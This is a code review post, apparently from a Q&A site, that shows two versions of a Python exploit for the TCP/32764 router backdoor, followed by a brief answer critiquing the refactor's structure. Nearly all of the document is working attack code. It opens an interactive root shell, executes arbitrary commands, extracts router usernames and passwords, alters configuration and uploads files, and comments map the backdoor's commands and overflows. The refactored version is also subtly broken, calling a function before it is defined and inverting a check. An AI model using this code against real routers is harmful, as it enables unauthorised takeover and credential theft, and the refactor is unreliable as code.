# Checks for TCP-32764 exploit

Tags: python, tcp

I refactored this proof of concept for the TCP-32764 exploit.
I'm writing a scanner based on this POC. The code works fine but It was really hard to read.

---

**Here is the original code**

```
#!/usr/bin/env python
import socket
import struct
import sys
import argparse
import re

parser = argparse.ArgumentParser(description='PoC for the TCP/32764 backdoor.\n'\
    'see https://github.com/elvanderb/TCP-32764 for more details')

parser.add_argument('--ip', type=str, nargs='?', help='routers IP', default='192.168.1.1')
parser.add_argument('--port', type=int, nargs='?', help='port to use', default=32764)
command_group = parser.add_mutually_exclusive_group()
command_group.add_argument('--is_vuln', help='tells you if the router is vulnerable or not (default)', action="store_true")
command_group.add_argument('--shell', help='gives you a root shell on the router', action="store_true")
command_group.add_argument('--execute', type=str, nargs='?', help='run a command and dump straight to stdout', default='')
command_group.add_argument('--print_conf', help='pretty print router\'s configuration', action="store_true")
command_group.add_argument('--get_credentials', help='gets credentials', action="store_true")
command_group.add_argument('--get_var', type=str, nargs='?', metavar='var_name', help='get router\'s configuration variable')
command_group.add_argument('--set_var', type=str, nargs='?', metavar='var_name=val', help='set router\'s configuration variable')
command_group.add_argument('--message', type=int, nargs='?', help='message to send', choices=range(1, 14))
command_group.add_argument('--send_file', type=str, nargs='?', help='file to send')
command_group.add_argument('--send_file2', type=str, nargs='?', help='file to send, using echo -n -e')
parser.add_argument('--payload', type=str, nargs='?', help='message\'s payload', default='')
parser.add_argument('--timeout', type=int, nargs='?', help='connexion timeout in seconds', default=1)
parser.add_argument('--remote-filename', type=str, nargs='?', help='remote filename in /tmp when copying', default="upload")

args = parser.parse_args()

def send_message(s, endianness, message, payload=''):
    header = struct.pack(endianness + 'III', 0x53634D4D, message, len(payload)+1)
    s.send(header+payload+"\x00")
    r = s.recv(0xC)

    while len(r) < 0xC:
        tmp = s.recv(0xC - len(r))
        assert len(tmp) != 0
        r += tmp

    sig, ret_val, ret_len = struct.unpack(endianness + 'III', r)
    assert(sig == 0x53634D4D)

    if ret_val != 0:
        return ret_val, "ERROR"

    ret_str = ""
    while len(ret_str) < ret_len:
        tmp = s.recv(ret_len - len(ret_str))
        assert len(tmp) != 0
        ret_str += tmp

    return ret_val, ret_str

# Big endian or little endian ?
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(args.timeout)
try :
    s.connect((args.ip, args.port))
except socket.error as v:
    print("probably not vulnerable (error: {0:s})".format(v))
    sys.exit(0)

s.send("blablablabla")
r = s.recv(0xC)
while len(r) < 0xC:
    tmp = s.recv(0xC - len(r))
    assert len(tmp) != 0
    r += tmp

sig, ret_val, ret_len = struct.unpack('<III', r)
if sig == 0x53634D4D :
    endianness = "<"
elif sig == 0x4D4D6353 :
    endianness = ">"
else :
    print("probably not vulnerable")
    sys.exit(0)
s.close()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(args.timeout)
s.connect((args.ip, args.port))
if args.is_vuln :
    print("{0:s}:{1:d} is vulnerable!".format(args.ip, args.port))
elif args.shell :
    print(send_message(s, endianness, 7, 'echo "welcome, here is a root shell, have fun"')[1])
    while 1 :
        print(send_message(s, endianness, 7, sys.stdin.readline().strip('\n'))[1])
elif len(args.execute) :
    sys.stdout.write(send_message(s, endianness, 7, args.execute)[1])
elif args.print_conf :
    conf = send_message(s, endianness, 1)[1]
    conf = conf.replace("\x00", "\n")
    conf = conf.replace("\x01", "\n\t")
    print(conf)
elif args.get_credentials :
    conf = send_message(s, endianness, 1)[1]
    lines = re.split("\x00|\x01", conf)
    pattern = re.compile('user(name)?|password|login');
    credentials = []
    for line in lines:
        try:
            (var, value) = line.split("=")
            if len(value)>0 and pattern.search(var):
                credentials += [[var, value]]
        except ValueError:
            pass
    credentials.sort()
    for var, value in credentials:
        print("{}:{}".format(var, value))
elif args.send_file:
    with open(args.send_file, "r") as f:
        buf = f.read()
        msg = args.remote_filename + "\0" + buf
        send_message(s, endianness, 8, msg);
elif args.send_file2:
    CHUNK = 1024
    fdst = "/tmp/" + args.remote_filename
    send_message(s, endianness, 7, "rm " + fdst)
    with open(args.send_file2, "rb") as f:
        while True:
            buf = f.read(CHUNK)
            if len(buf) == 0:
                break
            cmd = 'echo -n -e "' + ''.join(map(lambda c: "\\x{:02x}".format(ord(c)), buf))+'"'
            cmd += ' >>' + fdst
            try:
                send_message(s, endianness, 7, cmd)
            except socket.timeout:
                print("Timeout, reconnect...")
                s.close()
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(args.timeout)
                s.connect((args.ip, args.port))
                # Get current size
                ls = send_message(s, endianness, 7, "ls -l " + fdst)
                size = int(re.split('[ \t]+', ls)[4])
                # Let's start from here
                print("Seek from %d..." % size)
                f.seek(size)
elif args.get_var is not None :
    response = send_message(s, endianness, 2, args.get_var)[1].rstrip("\x00")
    if len(response) == 0 :
        print("{0:s} is not set".format(args.get_var))
    else :
        print(response)
elif args.set_var is not None :
    r, _ = send_message(s, endianness, 3, args.set_var)
elif args.message is not None :
    r, response = send_message(s, endianness, args.message, args.payload)
    if r != 0 :
        print("Command failed, error code: {0:08X}".format(r))
    elif len(response) != 0 :
        print("Command succeed:")
        print(response.encode("string_escape"))
    else :
        print("Command succeed:")
else :
    print("{0:s}:{1:d} is vulnerable!".format(args.ip, args.port))

s.close()

# Gives the login/pass of your router. Works for Linux for sure.
# python poc.py --get_credentials --ip $(ip route|grep -Eo 'default via ([0-9.]+)'|sed 's/default via //')

#commands :
# 1 : get infos
# 2 : get var -> possible overflow
# 3 : set var -> buffer overflow
# 4 : commit nvram (read nvram /dev/mtdblock/3 from /tmp/nvram and check CRC)
# 5 : bridge mode ?
#   wan_mode=bridgedonly
#   wan_encap=0
#   wan_vpi=8
#   wan_vci=81
#   /usr/bin/killall br2684ctl
#   /usr/bin/killall udhcpd
#   /usr/bin/killall -9 atm_monitor
#   /usr/sbin/rc wan stop >/dev/null 2>&1
#   /usr/sbin/atm_monitor&
# 6 : show speed
# 7 : cmd
#   special commands :
#       exit, bye, quit -> quit... (set alive to 0)
#       cd : change directory (a little bit WTF)
# other commands :
#       integer overflow in stdout handling (?) not exploitable but still ...
#       buffer overflow (buffer de 0x10000)
#
# 8 : write file (file name in payload, dir : tmp, directory traversa)
# 9 : print version
#10 : print modem router ip (nvram_get(lan_ipaddr))
#11 : resaure default settings (nvram_set(restore_default, 1) / nvram_commit)
#12 : read /dev/mtdblock/0 [-4:-2]
#13 : dump nvram on disk (/tmp/nvram) and commit
```

**Here is my re-write**

```
#!/usr/bin/env python

'''
TCP-32764 backdor exploit.
'''

import socket
import struct
import sys
import argparse
import re


def main():
    parser = argparse.ArgumentParser(
        description='PoC for the TCP/32764 backdoor.')

    parser.add_argument(
        '--ip',
        type=str,
        nargs='?',
        help='routers IP',
        default='192.168.1.1'
    )

    parser.add_argument(
        '--port',
        type=int,
        nargs='?',
        help='port to use',
        default=32764
    )

    command_group = parser.add_mutually_exclusive_group()

    command_group.add_argument(
        '--shell',
        help='gives you a root shell on the router',
        action="store_true"
    )

    command_group.add_argument(
        '--execute',
        type=str,
        nargs='?',
        help='run a command and dump straight to stdout',
        default=''
    )

    command_group.add_argument(
        '--print_conf',
        help='pretty print router\'s configuration',
        action="store_true"
    )

    command_group.add_argument(
        '--get_credentials',
        help='gets credentials',
        action="store_true"
    )

    command_group.add_argument(
        '--get_var',
        type=str,
        nargs='?',
        metavar='var_name',
        help='get router\'s configuration variable'
    )

    command_group.add_argument(
        '--set_var',
        type=str,
        nargs='?',
        metavar='var_name=val',
        help='set router\'s configuration variable'
    )

    command_group.add_argument(
        '--message',
        type=int,
        nargs='?',
        help='message to send',
        choices=range(1, 14)
    )

    command_group.add_argument(
        '--send_file',
        type=str,
        nargs='?',
        help='file to send'
    )

    parser.add_argument(
        '--payload',
        type=str,
        nargs='?',
        help='message\'s payload', default=''
    )

    parser.add_argument(
        '--timeout',
        type=int,
        nargs='?',
        help='connexion timeout in seconds',
        default=1
    )

    parser.add_argument(
        '--remote-filename',
        type=str,
        nargs='?',
        help='remote filename in /tmp when copying', default="upload"
    )

    args = parser.parse_args()
    endianness = get_endianness(args.ip, args.port)
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.settimeout(args.timeout)
    soc.connect((args.ip, args.port))


    def send_message(soc, endianness, message, payload=''):
        header = struct.pack(endianness + 'III', 0x53634D4D, message, len(payload)+1)
        soc.send(header+payload+"\x00")
        chunk = soc.recv(0xC)
        while len(chunk) < 0xC:
            tmp = soc.recv(0xC - len(chunk))
            chunk += tmp
        sig, ret_val, ret_len = struct.unpack(endianness + 'III', chunk)
        assert(sig == 0x53634D4D)
        if ret_val != 0:
            return ret_val, "ERROR"
        ret_str = ""
        while len(ret_str) < ret_len:
            tmp = soc.recv(ret_len - len(ret_str))
            ret_str += tmp
        return ret_val, ret_str

    # Big endian or little endian ?
    def get_endianness(addr, port):
        soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        soc.settimeout(5)
        try:
            soc.connect((addr, port))
        except socket.error as error:
            print("probably not vulnerable (error: {0:s})".format(error))
            sys.exit(0)
        try:
            soc.send("blablablabla")
            chunk = soc.recv(0xC)
            while len(chunk) < 0xC:
                tmp = soc.recv(0xC - len(chunk))
                chunk += tmp
        except socket.error as error:
            print("probably not vulnerable (error: {0:s})".format(error))
            return

        sig, _, _ = struct.unpack('<III', chunk)
        if sig == 0x53634D4D:
            endianness = "<"
        elif sig == 0x4D4D6353:
            endianness = ">"
        else:
            print("probably not vulnerable")
            sys.exit(0)
        soc.close()
        return endianness

    def shell():
        print(send_message(soc, endianness, 7, 'echo "welcome, here is a root shell, have fun"')[1])
        while 1:
            print(send_message(soc, endianness, 7, sys.stdin.readline().strip('\n'))[1])

    def execute():
        sys.stdout.write(send_message(soc, endianness, 7, args.execute)[1])

    def print_conf():
        conf = send_message(soc, endianness, 1)[1]
        conf = conf.replace("\x00", "\n")
        conf = conf.replace("\x01", "\n\t")
        print(conf)

    def get_credentials():
        conf = send_message(soc, endianness, 1)[1]
        lines = re.split("\x00|\x01", conf)
        pattern = re.compile('user(name)?|password|login')
        credentials = []
        for line in lines:
            try:
                (var, value) = line.split("=")
                if value and pattern.search(var):
                    credentials += [[var, value]]
            except ValueError:
                pass
        credentials.sort()
        for var, value in credentials:
            print("{}:{}".format(var, value))

    def send_file():
        with open(args.send_file, "r") as fobj:
            buf = fobj.read()
            msg = args.remote_filename + "\0" + buf
            send_message(soc, endianness, 8, msg)

    def get_var():
        response = send_message(soc, endianness, 2, args.get_var)[1].rstrip("\x00")
        if response:
            print("{0:s} is not set".format(args.get_var))
        else:
            print(response)

    def set_var():
        send_message(soc, endianness, 3, args.set_var)

    def message():
        ret_val, response = send_message(soc, endianness, args.message, args.payload)
        if ret_val:
            print("Command failed, error code: {0:08X}".format(ret_val))
        elif response:
            print("Command succeed:")
            print(response.encode("string_escape"))
        else:
            print("{0:s}:{1:d} is vulnerable!".format(args.ip, args.port))

    if args.shell:
        shell()

    elif args.execute:
        execute()

    elif args.print_conf:
        print_conf()

    elif args.get_credentials:
        get_credentials()

    elif args.send_file:
        send_file()

    elif args.get_var:
        get_var()

    elif args.set_var:
        set_var()

    elif args.message:
        message()

    soc.close()

if __name__ == '__main__':
    main()

# Gives the login/pass of your router. Works for Linux for sure.
# python poc.py --get_credentials --ip $(ip route|grep -Eo 'default via ([0-9.]+)'|sed 's/default via //')

#commands :
# 1 : get infos
# 2 : get var -> possible overflow
# 3 : set var -> buffer overflow
# 4 : commit nvram (read nvram /dev/mtdblock/3 from /tmp/nvram and check CRC)
# 5 : bridge mode ?
#    wan_mode=bridgedonly
#    wan_encap=0
#    wan_vpi=8
#    wan_vci=81
#    /usr/bin/killall br2684ctl
#    /usr/bin/killall udhcpd
#    /usr/bin/killall -9 atm_monitor
#    /usr/sbin/rc wan stop >/dev/null 2>&1
#    /usr/sbin/atm_monitor&
# 6 : show speed
# 7 : cmd
#    special commands :
#        exit, bye, quit -> quit... (set alive to 0)
#        cd : change directory (a little bit WTF)
# other commands :
#        integer overflow in stdout handling (?) not exploitable but still ...
#        buffer overflow (buffer de 0x10000)
#
# 8 : write file (file name in payload, dir : tmp, directory traversa)
# 9 : print version
#10 : print modem router ip (nvram_get(lan_ipaddr))
#11 : resaure default settings (nvram_set(restore_default, 1) / nvram_commit)
#12 : read /dev/mtdblock/0 [-4:-2]
#13 : dump nvram on disk (/tmp/nvram) and commit
```

---

Answer (score 3):

You have created a bunch of functions that are not reusable, because they...

1. are nested inside another function,
2. don't take their inputs as arguments, relying instead on variables defined in the enclosing function, and
3. `print` their results instead of `return`ing values.